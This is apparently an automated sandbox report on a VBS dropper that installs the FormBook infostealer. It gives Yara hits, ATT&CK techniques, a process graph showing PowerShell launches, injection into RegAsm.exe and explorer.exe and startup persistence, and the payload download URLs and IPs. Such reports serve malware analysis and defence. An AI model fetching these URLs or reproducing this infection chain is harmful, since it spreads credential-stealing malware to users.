          Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000017.00000002.956304495.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.503018278.0000012FD8224000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.593036972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.573682986.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.468889612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.552581892.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.522677927.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.955473010.00000000009F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.610838072.00000282491DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.502402216.0000012FD8108000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000000.588308493.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 9.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000017.00000002.956304495.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.503018278.0000012FD8224000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.593036972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.573682986.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.468889612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.552581892.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.522677927.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.955473010.00000000009F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.610838072.00000282491DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.502402216.0000012FD8108000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000000.588308493.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Command and Scripting Interpreter          		2
          Registry Run Keys / Startup Folder          		612
          Process Injection          		1
          Masquerading          		OS Credential Dumping1
          Query Registry          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Data Obfuscation          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts121
          Scripting          		1
          DLL Side-Loading          		2
          Registry Run Keys / Startup Folder          		41
          Virtualization/Sandbox Evasion          		LSASS Memory131
          Security Software Discovery          		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts1
          Shared Modules          		Logon Script (Windows)1
          DLL Side-Loading          		612
          Process Injection          		Security Account Manager2
          Process Discovery          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
          Ingress Tool Transfer          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local Accounts2
          PowerShell          		Logon Script (Mac)Logon Script (Mac)1
          Deobfuscate/Decode Files or Information          		NTDS41
          Virtualization/Sandbox Evasion          		Distributed Component Object ModelInput CaptureScheduled Transfer2
          Non-Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script121
          Scripting          		LSA Secrets1
          Application Window Discovery          		SSHKeyloggingData Transfer Size Limits2
          Application Layer Protocol          		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common4
          Obfuscated Files or Information          		Cached Domain Credentials2
          File and Directory Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Software Packing          		DCSync112
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 635407 Sample: daveCrpted.vbs Startdate: 27/05/2022 Architecture: WINDOWS Score: 100 71 www.nancykmorrison.store 2->71 73 www.hibikaiteki.com 2->73 85 Snort IDS alert for network traffic 2->85 87 Multi AV Scanner detection for domain / URL 2->87 89 Malicious sample detected (through community Yara rule) 2->89 91 5 other signatures 2->91 15 wscript.exe 1 2->15         started        signatures3 process4 signatures5 125 Suspicious powershell command line found 15->125 127 Wscript starts Powershell (via cmd or directly) 15->127 18 powershell.exe 9 15->18         started        process6 signatures7 83 Suspicious powershell command line found 18->83 21 powershell.exe 14 17 18->21         started        25 conhost.exe 18->25         started        process8 dnsIp9 75 20.106.232.4, 49738, 49778, 80 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 21->75 77 2.56.57.22, 49739, 49780, 80 GBTCLOUDUS Netherlands 21->77 93 Suspicious powershell command line found 21->93 95 Writes to foreign memory regions 21->95 97 Injects a PE file into a foreign processes 21->97 27 RegAsm.exe 21->27         started        30 powershell.exe 14 21->30         started        signatures10 process11 file12 109 Modifies the context of a thread in another process (thread injection) 27->109 111 Maps a DLL or memory area into another process 27->111 113 Sample uses process hollowing technique 27->113 115 2 other signatures 27->115 33 explorer.exe 27->33 injected 69 C:\ProgramData\Done.vbs, Little-endian 30->69 dropped 36 conhost.exe 30->36         started        signatures13 process14 signatures15 81 Suspicious powershell command line found 33->81 38 powershell.exe 3 14 33->38         started        41 cmmon32.exe 33->41         started        process16 signatures17 99 Suspicious powershell command line found 38->99 43 wscript.exe 1 38->43         started        47 powershell.exe 14 38->47         started        49 conhost.exe 1 38->49         started        101 Modifies the context of a thread in another process (thread injection) 41->101 103 Maps a DLL or memory area into another process 41->103 105 Tries to detect virtualization through RDTSC time measurements 41->105 51 cmd.exe 1 41->51         started        53 explorer.exe 2 160 41->53         started        55 explorer.exe 41->55         started        process18 dnsIp19 79 192.168.2.1 unknown unknown 43->79 117 Suspicious powershell command line found 43->117 119 Wscript starts Powershell (via cmd or directly) 43->119 57 powershell.exe 43->57         started        60 conhost.exe 51->60         started        signatures20 process21 signatures22 107 Suspicious powershell command line found 57->107 62 powershell.exe 57->62         started        65 conhost.exe 57->65         started        process23 signatures24 121 Writes to foreign memory regions 62->121 123 Injects a PE file into a foreign processes 62->123 67 RegAsm.exe 62->67         started        process25

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          daveCrpted.vbs12%ReversingLabsScript-WScript.Dropper.Honolulu

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          24.0.RegAsm.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.0.RegAsm.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.0.RegAsm.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          24.0.RegAsm.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          24.2.RegAsm.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.0.RegAsm.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.2.RegAsm.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          24.0.RegAsm.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://2.56.57.22/tsdfguhijk.txt0%Avira URL Cloudsafe
          http://20.6.0%VirustotalBrowse
          http://20.6.0%Avira URL Cloudsafe
          http://2.56.57.229%VirustotalBrowse
          http://2.56.57.220%Avira URL Cloudsafe
          http://2.50%Avira URL Cloudsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://20.106.232.4/dll/26-05-2022-StartUp.pdfPk100%Avira URL Cloudmalware
          http://20.106.232.4/rumpe/26-05-2022-StartUp.pdf100%Avira URL Cloudmalware
          https://contoso.com/0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          http://20.106.232.4/dll/26-05-2022-StartUp.pdf100%Avira URL Cloudmalware
          https://contoso.com/Icon0%URL Reputationsafe
          http://20.106.232.480%Avira URL Cloudsafe
          http://20.106.232.4100%Avira URL Cloudmalware
          http://2.56.57.22x0%Avira URL Cloudsafe
          http://2.56.57.22/ts0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.hibikaiteki.com
          		118.27.122.216
          		truefalse
            		high
            www.nancykmorrison.store
            		172.67.160.125
            		truefalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://2.56.57.22/tsdfguhijk.txttrue
              • Avira URL Cloud: safe
              		unknown
              http://20.106.232.4/rumpe/26-05-2022-StartUp.pdftrue
              • Avira URL Cloud: malware
              		unknown
              http://20.106.232.4/dll/26-05-2022-StartUp.pdftrue
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://20.6.powershell.exe, 00000006.00000003.478394040.0000012FDFF82000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.503288727.0000012FDFF82000.00000004.00000020.00020000.00000000.sdmptrue
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		low
              http://2.56.57.22powershell.exe, 00000006.00000002.490975728.0000012FC8CA5000.00000004.00000800.00020000.00000000.sdmptrue
              • 9%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.495224431.0000012FD7F45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.490798860.000001C7BF161000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://2.5powershell.exe, 00000006.00000002.490975728.0000012FC8CA5000.00000004.00000800.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		low
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.479916206.000001C7AF301000.00000004.00000800.00020000.00000000.sdmptrue
                • URL Reputation: safe
                		unknown
                http://20.106.232.4/dll/26-05-2022-StartUp.pdfPkpowershell.exe, 00000006.00000002.483072450.0000012FC80F0000.00000004.00000800.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.479916206.000001C7AF301000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://contoso.com/powershell.exe, 00000007.00000002.490798860.000001C7BF161000.00000004.00000800.00020000.00000000.sdmptrue
                  • URL Reputation: safe
                  		unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.495224431.0000012FD7F45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.490798860.000001C7BF161000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://contoso.com/Licensepowershell.exe, 00000007.00000002.490798860.000001C7BF161000.00000004.00000800.00020000.00000000.sdmptrue
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/Iconpowershell.exe, 00000007.00000002.490798860.000001C7BF161000.00000004.00000800.00020000.00000000.sdmptrue
                    • URL Reputation: safe
                    		unknown
                    http://20.106.232.48powershell.exe, 00000006.00000002.490975728.0000012FC8CA5000.00000004.00000800.00020000.00000000.sdmptrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://20.106.232.4powershell.exe, 00000006.00000002.490800447.0000012FC8C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.483072450.0000012FC80F0000.00000004.00000800.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://2.56.57.22xpowershell.exe, 00000006.00000002.483842645.0000012FC8286000.00000004.00000800.00020000.00000000.sdmptrue
                    • Avira URL Cloud: safe
                    		low
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.510984736.000001A54B2E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.480982102.0000012FC7EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.478703723.000001C7AF0F1000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.479916206.000001C7AF301000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://2.56.57.22/tspowershell.exe, 00000006.00000002.490975728.0000012FC8CA5000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        2.56.57.22
                        		unknownNetherlands
                        		395800GBTCLOUDUSfalse
                        20.106.232.4
                        		unknownUnited States
                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue

                        Private

                        IP
                        192.168.2.1

                        General Information

                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:635407
                        Start date and time: 27/05/202221:14:102022-05-27 21:14:10 +02:00
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 15m 49s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:daveCrpted.vbs
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:46
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:1
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.evad.winVBS@30/28@2/3
                        EGA Information:
                        • Successful, ratio: 62.5%
                        HDC Information:
                        • Successful, ratio: 64.7% (good quality ratio 59.1%)
                        • Quality average: 73.5%
                        • Quality standard deviation: 30.8%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Found application associated with file extension: .vbs
                        • Adjust boot time
                        • Enable AMSI
                        • Override analysis time to 240s for JS/VBS files not yet terminated

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SearchUI.exe, dllhost.exe, backgroundTaskHost.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, ShellExperienceHost.exe, WMIADAP.exe, conhost.exe, svchost.exe, mobsync.exe
                        • TCP Packets have been reduced to 100
                        • Excluded IPs from analysis (whitelisted): 20.42.73.29, 40.125.122.176, 20.223.24.244, 20.54.89.106
                        • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                        • Execution Graph export aborted for target powershell.exe, PID 1288 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 6508 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 7076 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtCreateFile calls found.
                        • Report size getting too big, too many NtEnumerateKey calls found.
                        • Report size getting too big, too many NtEnumerateValueKey calls found.
                        • Report size getting too big, too many NtOpenFile calls found.
                        • Report size getting too big, too many NtOpenKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        21:15:29API Interceptor172x Sleep call for process: powershell.exe modified
                        21:15:37AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk
                        21:17:09API Interceptor289x Sleep call for process: explorer.exe modified

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        No context

                        ASNs

                        No context

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\ProgramData\Done.vbs

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
                        Category:dropped
                        Size (bytes):848042
                        Entropy (8bit):1.1363099352339936
                        Encrypted:false
                        SSDEEP:192:6KqCQKQUBSRd6h7r1+5FL+HoFuM3BBxO1wjtg1v2U:6KqCQKQUBSRdK7r1+5FbBw1vJ
                        MD5:DC70EEFA088F688D1CD4C4CF2C6674CA
                        SHA1:C358867A468D9722B3C40F0BCD0CBE2534756545
                        SHA-256:1EC2C2C0A29C16146400C52880E887CFAE57223B2B621C0F433EF9B619AF5343
                        SHA-512:E95C7F6622486CCB16CD1C15E68BCA4101F2556C6A22A6B0318D03C9A9967097D0B98D37CE833E6669666318B7E73C2CA51513AC9A603A28D041A19B63DE8B02
                        Malicious:true
                        Reputation:unknown
                        Preview:......:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.....:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.....:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.....:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.....:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.....:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.

                        C:\ProgramData\Done.vbs:Zone.Identifier

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):26
                        Entropy (8bit):3.95006375643621
                        Encrypted:false
                        SSDEEP:3:ggPYV:rPYV
                        MD5:187F488E27DB4AF347237FE461A079AD
                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                        Malicious:false
                        Reputation:unknown
                        Preview:[ZoneTransfer]....ZoneId=0

                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):11606
                        Entropy (8bit):4.884004042663719
                        Encrypted:false
                        SSDEEP:192:h9smd3YrKkGdcU6CkVsm5emla9sm5ib4q4dVsm5emdjxoeRjp5Kib4n2Ca6pZlb4:ySib4q4dvEib42opbjvwRjdvRnrkjh4v
                        MD5:BD615E1A2BC83828E536E020BD2D7DE9
                        SHA1:340AF08B8BB60B52442FFE05FF8277C4276C8320
                        SHA-256:B5285E108F6ED9D942F56E840A5DFCA938E65FBC64A18729DFD96BE71D878416
                        SHA-512:90EC9D0E15D0D7609963BC7E19A2DE7B1D8B068460D2A0AA666D94E84360116868D19417F5C8D87E82D917CF6BC8BFFDEA8CDC73A86CD44419FFACA1E261D0E6
                        Malicious:false
                        Reputation:unknown
                        Preview:PSMODULECACHE.....7.t8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope.........w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider...........e...[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...

                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64
                        Entropy (8bit):0.9573488789684415
                        Encrypted:false
                        SSDEEP:3:Nlll//:NllF
                        MD5:16C3035F6A950D61BCE31A51351DDE0F
                        SHA1:EE8F043167D77479239B38A4A1DF7626CC540FFC
                        SHA-256:AEADE8853CA54B5064C5A734E5A5AB5FCEC2573B5AAC88C764F4416C319085DB
                        SHA-512:137B0CBF7FDE72D943945631248ECEC9BBB9025660EFE71516A3B7D360DC2EAFF4A2594AC1A9E875E318623B10C70A99FB4E4B22459F38537E75D4432CA213CD
                        Malicious:false
                        Reputation:unknown
                        Preview:@...e...........................................................

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_04g23aso.ckf.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Reputation:unknown
                        Preview:1

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_113xeubt.0rn.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Reputation:unknown
                        Preview:1

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_14hqbqjj.gxr.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
